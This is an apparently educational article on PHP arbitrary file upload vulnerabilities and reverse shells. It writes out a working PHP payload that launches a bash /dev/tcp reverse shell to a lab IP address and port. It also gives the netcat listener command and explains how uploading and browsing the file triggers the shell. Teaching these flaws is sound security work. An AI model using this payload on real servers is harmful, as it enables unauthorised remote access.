PHP
ethical-hacking
reverse-shell
arbitrary upload
remote execution
web exploitation
Exploring PHP vulnerabilities and how they turn into remote access. This exercise introduces us to one of the most basic —and powerful— techniques in the hacking world: the reverse shell. A simple vulnerable form, a malicious file uploaded without restrictions, and suddenly, the server is talking to you.
PHP (Hypertext Preprocessor) is an interpreted server-side programming language. Originally designed for web development, and despite criticism, it still powers much of the internet infrastructure.
It executes instructions directly on the server, which means that any uploaded and executed .php
file can have full access to the file system, system commands, and more —if not properly controlled.
PHP has been a source of vulnerabilities for years, mainly due to bad practices in:
include
, require
) without path validation.exec()
, system()
, eval()
.$_GET
, $_POST
, etc.).One of the most common —and deadly— is arbitrary file upload.
It means that an application allows you to upload any type of file, without checking extensions, content, permissions, or location.
In PHP environments, this can allow an attacker to upload a malicious .php
file. When that file is accessed from the browser, the server executes it as code. As a result, the attacker can execute commands, download tools, or establish a reverse shell.
A reverse shell is an outgoing connection from the victim machine to the attacker's machine. Instead of the attacker connecting directly to the server (which may be blocked by firewalls), the compromised machine connects out, opening a remote shell.
Once established, the attacker can:
All from a simple text connection.
A basic payload in PHP might look like this:
1<?php 2exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'"); 3?>
This tells the server: open a TCP connection to 192.168.56.1 on port 4444, and redirect bash's input and output to that socket. Meanwhile, on the attacker's machine, you wait for the connection with:
1nc -lvnp 4444
When the victim opens the PHP file through the browser, the code executes and the reverse shell is activated.
The absence of validation in upload forms can:
Best practices:
/uploads/
should be separated from the PHP backend).A reverse shell is the system's whisper, telling you: "You're no longer outside." A simple, poorly protected upload function is enough to turn a server into an open door, and you, as an attacker, just need to know where to look.